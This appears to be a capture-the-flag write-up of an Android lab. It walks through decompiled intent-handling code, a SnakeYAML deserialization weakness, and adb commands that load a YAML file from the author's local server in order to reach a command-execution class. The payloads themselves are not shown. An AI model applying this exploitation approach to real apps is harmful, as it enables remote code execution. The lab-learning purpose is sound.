Welcome to the Config Editor Challenge! In this lab, you’ll dive into a realistic situation involving vulnerabilities in a widely-used third-party library. Your objective is to exploit a library-induced vulnerability to achieve RCE on an Android application.
privatefinalvoidhandleIntent() {
Intent intent = getIntent();
String action = intent.getAction();
Uri data = intent.getData();
if (Intrinsics.areEqual("android.intent.action.VIEW", action) && data !=null) {
CopyUtil.INSTANCE.copyFileFromUri(data).observe(this, new MainActivity$sam$androidx_lifecycle_Observer$0(new Function1<Uri, Unit>() { // from class: com.mobilehackinglab.configeditor.MainActivity$handleIntent$1 {
super(1);
}
@Override// kotlin.jvm.functions.Function1public/* bridge *//* synthetic */ Unit invoke(Uri uri) {
invoke2(uri);
return Unit.INSTANCE;
}
/* renamed from: invoke, reason: avoid collision after fix types in other method */publicfinalvoidinvoke2(Uri uri) {
MainActivity mainActivity = MainActivity.this;
Intrinsics.checkNotNull(uri);
mainActivity.loadYaml(uri);
}
}));
}
}
Moving on to MainActivity code, there’s a handleIndent function where it will receive incoming intent and execute several function such as CopyUtil.INSTANCE.copyFileFromUri and loadYaml.
After looking into the imports, I noticed that the YAML is using snakeyaml. I then googled it and found some useful information such as this and this which it is possible to gain RCE.
Another thing is that there is a class and function LegacyCommandUtil where it is possible to execute command. I believe this will be used together with the YAML deserialization with SnakeYAML. Time to perform dynamic analysis to see how it actually works.
PS C:\> adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "http://192.168.68.107:8001/test.yaml"Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.68.107:8001/... cmp=com.mobilehackinglab.configeditor/.MainActivity }
From what I understand, this process basically just deserialize it using yaml.load and serialize back it using yaml.dump. Based on this article, I tried to use the payload and see if its work.
PS C:\> adb shell am start -n com.mobilehackinglab.configeditor/.MainActivity -a android.intent.action.VIEW -d "http://192.168.68.107:8001/test.yaml"Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.68.107:8001/... cmp=com.mobilehackinglab.configeditor/.MainActivity }
It seem’s like something is wrong and the POC provided did not work. I then tried to understand how the YAML deserialization works and see what I could do. After understanding it, I noticed that it has something to do with classes and the LegacyCommandUtil has classes in it. I then craft a payload and try to execute the LegacyCommandUtil function.